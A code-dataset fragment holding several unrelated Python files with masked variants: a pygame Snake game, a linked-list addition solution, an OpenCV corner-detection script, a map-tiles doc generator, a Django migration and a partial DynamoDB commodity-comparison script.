True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, (200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n 
self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n clock.tick(60)\n\n\nif __name__ == '__main__':\n game = Game()\n game.run()\n",
"step-5": "from typing import Sized\nimport pygame\nimport time\nfrom pygame.locals import *\nimport random\n\nSIZE = 20\nBACKGROUND = (45, 34, 44)\nW = 800\nH = 400\nSCREEN = (W, H)\n\n\nclass Snake:\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load(\n \"resources/snake.png\").convert() # inserting snake image\n\n self.snake_x = [W//2]*length # list with 'length' number of elements\n self.snake_y = [H//2]*length\n\n self.direction = \"left\" # default direction LEFT\n\n def increase_length(self):\n self.length += 1\n\n # adds another block to snake\n # appends a random value to the list...cause it will change immidiately in 'move()' method\n self.snake_x.append(0)\n self.snake_y.append(0)\n\n def draw(self):\n # self.parent_screen.fill(BACKGROUND)\n for i in range(self.length):\n self.parent_screen.blit(\n self.snake, (self.snake_x[i], self.snake_y[i])) # drawing snake\n pygame.display.flip()\n\n def move(self):\n # Logic gor moving the TAIL snakes [like 2nd snake will come to 1st pos, 3rd will move to 2nd pos.]\n\n for i in range(self.length-1, 0, -1): # reverse for loop\n self.snake_x[i] = self.snake_x[i-1]\n self.snake_y[i] = self.snake_y[i-1]\n\n # Logic for moving the head snakes\n\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n# Apple class\n\n\nclass Food:\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load(\n \"resources/food.png\").convert() # inserting food image\n self.food2 = pygame.image.load(\n 
\"resources/snake1.png\").convert() \n\n self.food_x = SIZE*3\n self.food_y = SIZE*2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y)) # drawing snake\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W//SIZE - 1) * SIZE\n self.food_y = random.randint(0, H//SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(\"Snake Game\")\n\n self.surface = pygame.display.set_mode(\n SCREEN) # crating game window 1000x720\n self.surface.fill(BACKGROUND) # rgb color combination\n\n # snake object (surface, size_of_snake)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n\n self.food = Food(self.surface) # Food object(Surface)\n self.food.draw()\n\n pygame.mixer.init() # pygame class mixer...for sound\n\n # start playing background b_music\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location) # sound is for short time\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load(\"resources/b_music1.mp3\")\n pygame.mixer.music.play(-1) #plays music infinitely\n\n def render_background(self):\n bg = pygame.image.load(\"resources/background.jpg\")\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n\n self.render_background() # render the background\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n\n # Snake colloding with apple\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0], self.food.food_x, self.food.food_y):\n self.food.move() # moves apple to random position\n self.snake.increase_length()\n # play sound when eating the food\n self.play_sound(\"resources/ding.mp3\") # passing the music location\n # to 
play the sound\n\n # Snake colliding with itself Game Over logic\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0], self.snake.snake_x[i], self.snake.snake_y[i]):\n # play sound when game Over\n self.play_sound(\"resources/fail_buzz.mp3\")\n\n raise \"Game Over\" # raising exeption\n \n self.touch_border_action()\n \n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(\n f\"<Paused>\", True, (200, 200, 200))\n line2 = font.render(\n f\"Press <UP, DOWN, LEFT, RIGHT> To Resume\", True, (255,255, 0))\n self.surface.blit(line1, (W//4 + 20, H//3))\n self.surface.blit(line2, (W//4 + 30, H//3 + 100))\n\n pygame.display.flip()\n\n def show_game_over(self):\n # self.surface.fill(BACKGROUND)\n self.render_background()\n\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(\n f\"GAME OVER !!\", True, (200, 0, 0))\n line1B = font.render(\n f\"<<Score : {self.snake.length - 3}>>\", True, (10, 255, 10))\n\n line2 = font.render(\n f\"Press <UP, DOWN, LEFT, RIGHT> To Play Again\", True, (200, 200, 200))\n line3 = font.render(\n f\"Press ESC to EXIT!\", True, (255, 200, 0))\n\n self.surface.blit(line1, (W//4 - 25, H//3-45))\n self.surface.blit(line1B, (W//4 + 100, H//3 + 60))\n self.surface.blit(line2, (45, H//3 + 110))\n self.surface.blit(line3, (W//4+50, H//3 + 160))\n\n pygame.display.flip()\n # pause the background_music when game over\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n \n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W \n \n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n\n self.food = Food(self.surface) # 
Food object(Surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(\n f\"[Score : {self.snake.length - 3}]\", True, (0, 255, 255))\n self.surface.blit(score, (W //2 - 70 , 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni',16)\n msgs1 = font.render(\"[SPACE] to Pause\", True, (200, 204, 255))\n msgs2 = font.render(\"[ESC] to EXIT\", True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE: # PRESS esc to escape the screen\n running = False\n if event.key == K_SPACE: # to pause the game\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n\n elif event.type == QUIT:\n running = False\n\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n\n clock.tick(60)\n\n\nif __name__ == \"__main__\":\n\n game = Game() # Game class object\n game.run()\n\n # auto-py-to-exe.exe # run this commande to convert to exe\n",
"step-ids": [
17,
26,
29,
30,
31
]
}
|
[
17,
26,
29,
30,
31
] |
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
<|reserved_special_token_1|>
class ListNode(object):
<|reserved_special_token_0|>
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
<|reserved_special_token_1|>
class ListNode(object):
def __init__(self, val, next=None):
self.val = val
self.next = next
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
|
flexible
|
{
"blob_id": "8909ee9c54a234222a41249e1f3005fd86e21cf0",
"index": 1782,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-2": "<mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-3": "class ListNode(object):\n <mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-4": "class ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
import numpy as np
import cv2
import sys
import math

cap = cv2.VideoCapture(0)

while True:
    # Keep the capture stream drained even though the analysed image below
    # is a static test file rather than the live frame.
    _, frame = cap.read()

    img = cv2.imread("zielfeld_mit_Zeugs_2.png")
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

    # Harris corner response; dilate to fatten the response maxima.
    dst = cv2.cornerHarris(np.float32(gray), 2, 3, 0.04)
    dst = cv2.dilate(dst, None)

    # Binarise the response at 1% of its peak and collapse each connected
    # corner region to its centroid.
    ret, dst = cv2.threshold(dst, 0.01 * dst.max(), 255, 0)
    dst = np.uint8(dst)
    ret, labels, stats, centroids = cv2.connectedComponentsWithStats(dst)

    # Refine the centroids to sub-pixel corner positions.
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.001)
    corners = cv2.cornerSubPix(gray, np.float32(centroids), (5, 5), (-1, -1),
                               criteria)

    # Pair centroids with refined corners and sort top-to-bottom (by y).
    res = np.hstack((centroids, corners))
    res = np.int0(res)
    res = res[res[:, 1].argsort()]

    num_edges = len(res)
    required_matches = 4   # stop once this many corners have been accepted
    threshold = 10         # allowed jitter between consecutive link distances

    prev_dist = 0
    dist_to_nearest = sys.maxsize  # was sys.maxint (Python 2 only)
    num_matches = 0
    next_idx = 0
    i = 0
    # Walk the sorted corner list, accepting corners whose nearest-neighbour
    # distance stays within `threshold` of the previous one.
    while i < int(math.ceil(num_edges / 2.0)):
        # Candidate neighbours: the next two corners and the two corners
        # mirrored from the bottom of the sorted list.
        idxs = [i + 1, i + 2, num_edges - i - 1, num_edges - i - 2]
        for j in idxs:
            # Manhattan distance between corner i and candidate j.
            d1 = int(math.fabs(res[i, 0] - res[j, 0])) + \
                 int(math.fabs(res[i, 1] - res[j, 1]))
            if d1 < dist_to_nearest:
                dist_to_nearest = d1
                next_idx = j
        within_threshold = (prev_dist + threshold) > dist_to_nearest and \
                           (prev_dist - threshold) < dist_to_nearest
        print(i, next_idx, dist_to_nearest)  # was a Python 2 print statement
        if i == 0:
            # First corner has no previous distance to compare against.
            within_threshold = True
            prev_dist = dist_to_nearest
        if within_threshold:
            # Mark the accepted corner in red and jump to its neighbour.
            img[res[i, 1], res[i, 0]] = [0, 0, 255]
            num_matches += 1
            if num_matches == required_matches:
                break
            i = next_idx
        else:
            # Sequence broken: restart the count from the next corner.
            prev_dist = dist_to_nearest
            num_matches = 0
            i += 1
        dist_to_nearest = sys.maxsize

    cv2.imshow('video', img)
    if cv2.waitKey(1) == 27:  # Esc key quits
        break

cap.release()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "3f5ae2b25fc506b980de3ee87c952ff699e10003",
"index": 4977,
"step-1": "import numpy as np\r\nimport cv2\r\nimport sys\r\nimport math\r\n\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile(True):\r\n _, img = cap.read()\r\n #gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n\r\n img = cv2.imread(\"zielfeld_mit_Zeugs_2.png\")\r\n #img = cv2.imread(\"zielfeld_mit_Zeugs_2.jpg\")\r\n #imS = cv2.resize(img, (480, 480))\r\n\r\n # img[img] = [255]\r\n \r\n \r\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n ret,thresh1 = cv2.threshold(gray,70,255,cv2.THRESH_BINARY)\r\n th2 = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY,11,2)\r\n th3 = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,11,2)\r\n\r\n upper = 120\r\n lower_red = np.array([1,1,1])\r\n upper_red = np.array([upper,upper,upper])\r\n \r\n mask = cv2.inRange(hsv, lower_red, upper_red)\r\n maskedImg = cv2.bitwise_and(img,img, mask= mask)\r\n\r\n thresh1_d = cv2.dilate(maskedImg,None)\r\n thresh1_e = cv2.erode(thresh1_d, None)\r\n\r\n \r\n # cv2.imshow('video_1',gray)\r\n \r\n dst = cv2.cornerHarris(np.float32(gray),2,3,0.04)\r\n \r\n #result is dilated for marking the corners, not important\r\n dst = cv2.dilate(dst,None)\r\n \r\n edge_indices = np.transpose(np.where(dst>=0.01*dst.max()))\r\n\r\n #for i in edge_indices:\r\n #img[i[0],i[1]]=[0,255,0]\r\n\r\n \r\n ret, dst = cv2.threshold(dst,0.01*dst.max(),255,0)\r\n dst = np.uint8(dst)\r\n\r\n # find centroids\r\n ret, labels, stats, centroids = cv2.connectedComponentsWithStats(dst)\r\n\r\n # define the criteria to stop and refine the corners\r\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.001)\r\n corners = cv2.cornerSubPix(gray,np.float32(centroids),(5,5),(-1,-1),criteria)\r\n\r\n\r\n \r\n # Now draw them\r\n res = np.hstack((centroids,corners))\r\n res = np.int0(res)\r\n\r\n \r\n res = res[res[:,1].argsort()]\r\n \r\n num_edges = len(res)\r\n required_matches = 4\r\n threshold = 10\r\n 
\r\n prev_dist = 0\r\n dist_to_nearest = sys.maxint\r\n num_matches = 0\r\n next_idx = 0;\r\n i = 0\r\n while i < int(math.ceil(num_edges/float(2))):\r\n idxs = [i+1,i+2,num_edges-i-1, num_edges-i-2]\r\n \r\n for j in idxs: \r\n d1 = int(math.fabs(res[i,0]-res[j,0]))+int(math.fabs(res[i,1]-res[j,1]))\r\n \r\n if d1 < dist_to_nearest:\r\n dist_to_nearest = d1\r\n next_idx = j;\r\n \r\n within_threshold = (prev_dist+threshold) > dist_to_nearest and (prev_dist-threshold) < dist_to_nearest \r\n print i,next_idx, dist_to_nearest\r\n if i == 0:\r\n within_threshold = True\r\n prev_dist = dist_to_nearest\r\n\r\n if within_threshold:\r\n \r\n img[res[i,1],res[i,0]]=[0,0,255]\r\n \r\n num_matches += 1\r\n \r\n if num_matches == required_matches:\r\n break\r\n i = next_idx\r\n \r\n \r\n else:\r\n \r\n \r\n prev_dist = dist_to_nearest\r\n \r\n num_matches = 0\r\n i += 1\r\n dist_to_nearest = sys.maxint\r\n \r\n # img[res[i,1],res[i,0]]=[0,255,0]\r\n \r\n #img[res[len(res)-1,1],res[len(res)-1,0]]=[0,255,0]\r\n\r\n## res = res[1:]\r\n## for i1 in range(len(res)/2):\r\n## h_y = (res[i1][1] + res[len(res)-i1-1][1]) / 2\r\n## \r\n## a = res[res[:,0].argsort()]\r\n## h_x = (a[0][1] + a[len(a)-1][1]) / 2\r\n## \r\n## img[h_y][h_x-10:h_x+10]=[0,0,255]\r\n\r\n \r\n #cv2.line(img,(res[0][0], res[0][1]),(res[len(res)-1][0],res[len(res)-1][1]),(255,0,0),5)\r\n \r\n \r\n # cv2.line(img,(a[0][0], a[0][1]),(a[len(a)-1][0],a[len(a)-1][1]),(0,0,255),5)\r\n \r\n\r\n cv2.imshow('video',img)\r\n if cv2.waitKey(1)==27:# esc Key\r\n break\r\n\r\ncap.release() \r\ncv2.destroyAllWindows()\r\n\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
"""
Usage:
  generate-doc <layer-definition>
  generate-doc --help
  generate-doc --version
Options:
  --help              Show this screen.
  --version           Show version.
"""
from docopt import docopt
import openmaptiles
from openmaptiles.tileset import Layer
from openmaptiles.docs import collect_documentation

# Script entry point: render one tileset layer's documentation as Markdown.
if __name__ == '__main__':
    # docopt parses the module docstring above as the CLI spec; it exits
    # automatically on --help / --version.
    args = docopt(__doc__, version=openmaptiles.__version__)
    # Load the <layer-definition> file (presumably a layer YAML — see
    # openmaptiles.tileset.Layer for the accepted format).
    layer = Layer.parse(args['<layer-definition>'])
    # Collect the layer's embedded documentation and emit it to stdout.
    markdown = collect_documentation(layer)
    print(markdown)
|
normal
|
{
"blob_id": "991b894c4c0fb9cb90aef0542227e001a3a3bb0d",
"index": 9651,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n args = docopt(__doc__, version=openmaptiles.__version__)\n layer = Layer.parse(args['<layer-definition>'])\n markdown = collect_documentation(layer)\n print(markdown)\n",
"step-3": "<mask token>\nfrom docopt import docopt\nimport openmaptiles\nfrom openmaptiles.tileset import Layer\nfrom openmaptiles.docs import collect_documentation\nif __name__ == '__main__':\n args = docopt(__doc__, version=openmaptiles.__version__)\n layer = Layer.parse(args['<layer-definition>'])\n markdown = collect_documentation(layer)\n print(markdown)\n",
"step-4": "#!/usr/bin/env python\n\"\"\"\nUsage:\n generate-doc <layer-definition>\n generate-doc --help\n generate-doc --version\nOptions:\n --help Show this screen.\n --version Show version.\n\"\"\"\nfrom docopt import docopt\nimport openmaptiles\nfrom openmaptiles.tileset import Layer\nfrom openmaptiles.docs import collect_documentation\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version=openmaptiles.__version__)\n layer = Layer.parse(args['<layer-definition>'])\n markdown = collect_documentation(layer)\n print(markdown)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 2.1.7 on 2019-04-01 14:37
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax ``execution_time`` on the ``mainsubmission`` model.

    Redefines the column as a DecimalField (max 6 digits, 3 decimal places,
    default 0) that also accepts NULL (``null=True``) and empty form input
    (``blank=True``).
    """

    # Must run after the previous auto-generated migration of this app.
    dependencies = [
        ('submissions', '0004_auto_20190401_1834'),
    ]

    operations = [
        migrations.AlterField(
            model_name='mainsubmission',
            name='execution_time',
            field=models.DecimalField(blank=True, decimal_places=3, default=0, max_digits=6, null=True),
        ),
    ]
|
normal
|
{
"blob_id": "3fed8723d215bce3cf391752e07ca85b2d6701a3",
"index": 3410,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('submissions', '0004_auto_20190401_1834')]\n operations = [migrations.AlterField(model_name='mainsubmission', name=\n 'execution_time', field=models.DecimalField(blank=True,\n decimal_places=3, default=0, max_digits=6, null=True))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('submissions', '0004_auto_20190401_1834')]\n operations = [migrations.AlterField(model_name='mainsubmission', name=\n 'execution_time', field=models.DecimalField(blank=True,\n decimal_places=3, default=0, max_digits=6, null=True))]\n",
"step-5": "# Generated by Django 2.1.7 on 2019-04-01 14:37\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('submissions', '0004_auto_20190401_1834'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='mainsubmission',\n name='execution_time',\n field=models.DecimalField(blank=True, decimal_places=3, default=0, max_digits=6, null=True),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Table-name constant; presumably imported by data-access code elsewhere —
# confirm usage at call sites.
TABLE_NAME = 'active_module'
|
normal
|
{
"blob_id": "ff3962d875da8e3f9e6c3178b1a8191ebb8a7b60",
"index": 3639,
"step-1": "<mask token>\n",
"step-2": "TABLE_NAME = 'active_module'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
# Package/module version string (single-sourced version attribute).
__version__ = '0.90.03'
|
normal
|
{
"blob_id": "284e4f79748c17d44518f2ce424db5b1697373dc",
"index": 3156,
"step-1": "<mask token>\n",
"step-2": "__version__ = '0.90.03'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
def main():
    """Command-line driver.

    Connects to DynamoDB, verifies the regional tables exist, loads the
    commodity/variable encodings from ENCODINGS_CSV, resolves the commodity
    given on the command line (or prompted for), prints a comparison table
    for every variable accepted by is_common_variable(), and ends with an
    overall verdict on which "North America" definition (CAN+USA vs
    CAN+USA+MEX) the data fits.
    """
    # AWS handles and the running totals are shared with output_table()
    # through module-level globals.
    global dynamodb_client
    global dynamodb_resource
    global na_table
    global canada_table
    global usa_table
    global mexico_table
    global total_can_usa
    global total_can_usa_mex
    global total_neither
    argc = len(sys.argv)
    bad_usage_flag = False
    if argc > 2:
        bad_usage_flag = True
        print('Error: Too many arguments.')
    if bad_usage_flag:
        # USAGE_STATEMENT is a module-level constant (defined elsewhere).
        sys.exit(USAGE_STATEMENT)
    dynamodb_client = boto3.client('dynamodb')
    dynamodb_resource = boto3.resource('dynamodb')
    # Probe the credentials with a cheap API call before doing real work.
    try:
        dynamodb_client.list_tables()
    except Exception as e:
        print(
            "Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')"
            )
        sys.exit(f'[ERROR] {e}')
    err_output = ''
    table_list = dynamodb_client.list_tables()['TableNames']
    print(f'Existing Tables: {table_list}')
    # Every table named in TABLE_LIST (module constant) must already exist.
    for t in TABLE_LIST:
        if t not in table_list:
            err_output += (
                f"Error: Invalid table name '{t}' - table does not exist.\n")
    if err_output != '':
        print(err_output.strip('\n'))
        sys.exit(
            'ERROR: Terminating program because unable to get table that does not exist.'
            )
    # Table handles for the four regions (table names are module constants).
    na_table = dynamodb_resource.Table(NORTH_AMERICA)
    canada_table = dynamodb_resource.Table(CANADA)
    usa_table = dynamodb_resource.Table(USA)
    mexico_table = dynamodb_resource.Table(MEXICO)
    # Load code->label maps for commodities and variables from the CSV.
    # Row layout assumed: [code, label, kind] — TODO confirm against the file.
    commodity_encodings_dict = {}
    variable_encodings_dict = {}
    with open(ENCODINGS_CSV, 'r', newline='') as csv_file:
        csv_content = csv.reader(csv_file, delimiter=',')
        for row in csv_content:
            if row[2] == 'variable':
                variable_encodings_dict[row[0]] = row[1]
            elif row[2] == 'commodity':
                commodity_encodings_dict[row[0]] = row[1]
        csv_file.close()  # redundant: the with-statement already closes it
    # Commodity comes from argv when supplied, otherwise prompt the user.
    if argc == 2:
        commodity_input = sys.argv[1]
    else:
        commodity_input = input('Commodity: ').strip()
    # Accept either the encoding code itself or its human-readable label.
    if commodity_input.upper() in commodity_encodings_dict:
        commodity_code = commodity_input.upper()
    else:
        commodity_code = convert_dict_label_to_code_key(commodity_input,
            commodity_encodings_dict)
        print(f'ENCODING: {commodity_code}')
    if commodity_code is None:
        print(f"Error: Commodity '{commodity_input}' was not found.")
        sys.exit(
            'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'
            )
    # Reset the cross-variable totals that output_table() accumulates.
    total_can_usa = 0
    total_can_usa_mex = 0
    total_neither = 0
    for var in variable_encodings_dict.keys():
        # is_common_variable() is defined elsewhere in this module;
        # presumably it checks the variable exists for this commodity in
        # every table — confirm.
        if is_common_variable(commodity_code, var):
            output_table(commodity_code, var, variable_encodings_dict,
                commodity_encodings_dict)
    # Majority vote across all variables decides the overall definition.
    max_hits = max(total_can_usa, total_can_usa_mex, total_neither)
    if total_can_usa == max_hits:
        na_defn = 'CAN+USA'
    elif total_can_usa_mex == max_hits:
        na_defn = 'CAN+USA+MEX'
    else:
        na_defn = 'Neither'
    print(
        f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'
        )
    print(
        f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\n'
        )
def convert_dict_label_to_code_key(label, encodings_dict):
    """Reverse lookup: return the first key in *encodings_dict* whose value
    equals *label*, or ``None`` when no entry matches.

    Replaces the previous ``list(values()).index(...)`` double traversal
    with a single pass over the items; first-match semantics (insertion
    order) are preserved.
    """
    for code, code_label in encodings_dict.items():
        if code_label == label:
            return code
    return None
<|reserved_special_token_0|>
def has_commodity_and_variable(table, commodity_code, variable):
    """Return True when *table* holds at least one item whose 'commodity'
    and 'variable' attributes match the given values."""
    condition = (Attr('commodity').eq(commodity_code)
                 & Attr('variable').eq(variable))
    matches = table.scan(FilterExpression=condition)
    return matches['Count'] > 0
def output_table(commodity_code, variable, variable_encodings_dict,
    commodity_encodings_dict):
